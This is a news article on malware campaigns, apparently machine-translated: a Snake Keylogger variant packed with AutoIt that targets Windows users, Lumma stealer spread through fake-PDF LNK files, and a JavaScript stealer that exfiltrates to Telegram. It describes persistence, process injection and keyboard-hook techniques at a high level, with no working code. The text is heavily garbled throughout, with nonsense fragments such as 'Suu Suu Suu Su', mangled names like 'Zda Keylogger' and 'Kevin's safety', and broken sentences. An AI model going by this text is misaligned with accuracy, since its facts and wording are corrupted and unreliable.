The new option A snake key Malicious software is used for active targeting on Windows users located in China, Turkey, Indonesia, Taiwan and Spain.
Fortinet Fortiguard Labs said the new version of the malicious software lag behind 280 million blocked attempts worldwide since the beginning of the year.
“Usually provided through phishing -leaves containing malicious attachments or links, a snake Keylogger is designed for theft of secret information from popular web browsers such as Chrome, Edge and Firefox, writing the keys, recording credentials and monitoring the Kevin’s safety. Suu Suu Suu Su -Su – – Note.
Other features allow him to highlight the stolen information on the controlled server attacker using a simple mail transfer protocol (SMTP), allowing the threat to the threat to access the stolen credentials and other sensitive data. “
What is characteristic of the last set of attacks is that it uses the language of auto -delivery scenarios to deliver and perform the main useful load. In other words, a file containing malicious software is a binary autoat that allows it to bypass traditional detection mechanisms.
“The use of auto -authenticity not only complicates static analysis, built up a useful load into the written scenario, but also allows for dynamic behavior that mimic benign automation instruments,” SU added.
After starting Snake Keylogger, it is designed to reset a copy of yourself into a file called “Ageless.exe” in the folder%local_appdata%\ supergroup “. It also goes to discard another file called “Ageless.vbs” in the Windows launch folder so that Visual Basic (VBS) automatically launches malicious software whenever the system is restarted.
Thanks to this resistance mechanism, the Zda Keylogger is able to maintain access to the compromised system and restore its malware, even if the related process stops.
The attack network ends with the injection of the main useful load into legal .Net -process such as “regsvcs.exe” using a technique called Process, which allows you .
It has also been found that Snake Keylogger also uses keys and uses sites such as Checkip.dyndns (.) Org to get the IP -Drace victim and geolocation.
“To fix the keys, it uses API SetwindowShokex with the first parameter set on wh_Keyboard_ll (flag 13), a low-level hook that monitor the keys,” SU said. “This technique allows for malicious software to log in, such as banking credentials.”
Development occurs when Cloudsek talks in detail about a company that uses impaired infrastructure associated with educational institutions to distribute malicious LNK files, disguised in PDF documents to end up expand Theft of a lama malicious software.
Activities, orientation to such as finances, healthcare, technology and media are a multi-stage sequence of attacks, which leads to passwords, browser and cryptocurrency wallets.
“The primary vector of the company infection includes the use of malicious files LNK (label) created as legitimate PDF documents,” Saharia’s security researcher is safety – NoteAdding files are located on the WebDAV server, which after visiting the sites is redirected to the sites.
The LNK file, for its part, executes the PowerShell command to connect to the remote server and extract malicious software at the next stage, embarrassed JavaScript code, which has another PowerShell, which loads the theft of Lumma from the same server and performs it.
In recent weeks, malicious “theft” software has also been distributed through Exchanged JavaScript files To dial a wide range of sensitive data from broken Windows and exfiltrate systems to a telegram controlled by an attacker.
“Attack begins with a confusing JavaScript file that receives coded lines from the open source service to perform the PowerShell script,” Cyfirma – Note.
“Then this scenario loads the JPG image and the text file with IP -Odrass and URL, both of which contain malicious executable MZ DOS files, built -in stegographic methods. After performing these useful loads deploy malicious software for theft.”
